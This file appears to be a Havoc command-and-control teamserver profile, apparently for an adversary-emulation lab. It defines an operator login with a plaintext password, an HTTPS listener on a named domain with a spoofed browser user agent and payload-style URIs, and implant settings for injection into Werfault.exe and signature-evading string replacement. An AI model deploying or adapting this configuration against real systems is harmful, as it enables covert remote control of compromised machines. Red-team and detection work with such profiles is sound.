Teamserver {
        Host = "0.0.0.0"
        Port = 40777

  Build {
        Compiler64 = "data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc"
        Nasm = "/usr/bin/nasm"
    }
}

Operators {
        user "cmndcntrl" {
                Password = "H@v0cP@$$"
        }

        #user "cmndcntrl" {
        #       Password = "password1234"
        #}
}

Listeners {

    Http {
        
        Name         = "Agent Listener - HTTP/s"
        #KillDate    = "2006-01-02 15:04:05" 
        #WorkingHours = "8:00-17:00"
        
        Hosts        = ["havoc-attck-node.net"]
        HostBind     = "0.0.0.0"
        PortBind     = 443
        PortConn     = 443
        HostRotation = "round-robin"
        Secure       = true
        UserAgent    = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"

        Uris = [
            "/update.exe",
            "/indexer",
            "/msf-rev-tap.exe",
            "/msf-rev-tap.txt",
            "/ghost.js"
        ]

        Headers = [
            "Content-type: text/plain",
            "X-ATTCK-Node: true",
            "X-ATTCK-EMU: Demon"
        ]

        
        Cert = [
            Cert = "/etc/letsencrypt/live/havoc.attck-node.net/fullchain.pem",
            Key = "/etc/letsencrypt/live/havoc.attck-node.net/privkey.pem"
        ]
    

        Response {
            Headers = [
                "Content-type: text/plain",
                "X-ATTCK-EMU: true",
            ]
        }
    }
}

Demon {
    Sleep = 2
    Jitter = 50
    TrustXForwardedFor = false

    Injection {
        Spawn64 = "C:\\Windows\\System32\\Werfault.exe"
        Spawn32 = "C:\\Windows\\System32\\Werfault.exe"
    }
    Binary {
        ReplaceStrings-x64 = {
            "demon.x64.exe": "demon.x64.bin",
            "This program cannot be run in DOS mode.": "",
        }

        ReplaceStrings-x86 = {
            "demon.x86.dll": "",
            "This program cannot be run in DOS mode.": "",
        }

    }
}